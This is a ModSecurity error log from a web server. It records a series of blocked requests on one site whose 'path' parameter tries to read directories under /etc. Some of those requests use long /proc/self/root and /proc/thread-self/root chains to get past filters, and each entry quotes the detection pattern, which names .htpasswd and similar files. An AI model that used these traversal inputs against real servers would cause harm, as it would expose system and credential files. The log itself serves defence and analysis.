[Wed Mar 18 04:05:01.363267 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:59734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOnfu8EFLIOrSqIpvHmAAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:04.619695 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:59742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOoNa6ubjKNq_cu4ZXYgAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:06.136625 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:59758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOovu8EFLIOrSqIpvHmgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:07.410877 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:59766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOo8df6f5d65gmYZSR2AAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:08.739091 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:59776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOpOw_le52K8_3pV2hEwAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:11.076982 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:37512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOp-w_le52K8_3pV2hFgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:12.416536 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:37518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOqCmAPhZkrhU8w4kvAQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:13.742959 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:37528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOqeoXxyEfFpUF8f8ujgAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:15.938036 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:37540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOq-w_le52K8_3pV2hGQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:17.256318 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:37544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOrdY0UrI5A3LftIxTsgAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:18.579160 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:37546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOrsdf6f5d65gmYZSR2wAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:20.023472 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:56198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOsNY0UrI5A3LftIxTvQAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:21.351922 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:56210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOsSmAPhZkrhU8w4kvBAAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:22.460012 2026] [:error] [pid 17653:tid 140411708356352] [client 216.73.216.191:49024] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOssdf6f5d65gmYZSR3wAAAsQ"]
[Wed Mar 18 04:05:24.097450 2026] [:error] [pid 11816:tid 140411725141760] [client 216.73.216.191:49042] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOs-w_le52K8_3pV2hJAAAAgI"]
[Wed Mar 18 04:05:24.101984 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:56174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOs9a6ubjKNq_cu4ZXegAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:05:24.103367 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:56214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOsuoXxyEfFpUF8f8ulQAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:24.108899 2026] [:error] [pid 31803:tid 140411540502272] [client 216.73.216.191:49040] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOs-yqAr6etmhZHNp6VwAAAFg"]
[Wed Mar 18 04:05:24.110124 2026] [:error] [pid 31803:tid 140411666392832] [client 216.73.216.191:49044] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOs-yqAr6etmhZHNp6WAAAAEk"]
[Wed Mar 18 04:05:25.471664 2026] [:error] [pid 31803:tid 140411616036608] [client 216.73.216.191:49124] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOteyqAr6etmhZHNp6XAAAAE8"]
[Wed Mar 18 04:05:25.743941 2026] [:error] [pid 17653:tid 140411716749056] [client 216.73.216.191:49136] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOtcdf6f5d65gmYZSR4QAAAsM"]
[Wed Mar 18 04:05:25.799325 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:56228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOteyqAr6etmhZHNp6XQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:05:26.030413 2026] [:error] [pid 11816:tid 140411658000128] [client 216.73.216.191:49164] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOtuw_le52K8_3pV2hJgAAAgo"]
[Wed Mar 18 04:05:26.124087 2026] [:error] [pid 30077:tid 140411590858496] [client 216.73.216.191:49172] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOtvu8EFLIOrSqIpvHpQAAAlI"]
[Wed Mar 18 04:05:29.271627 2026] [:error] [pid 15826:tid 140411607643904] [client 216.73.216.191:49220] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOtuoXxyEfFpUF8f8ulwAAAVA"]
[Wed Mar 18 04:05:29.294712 2026] [:error] [pid 31803:tid 140411716749056] [client 216.73.216.191:49204] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOtuyqAr6etmhZHNp6YAAAAEM"]
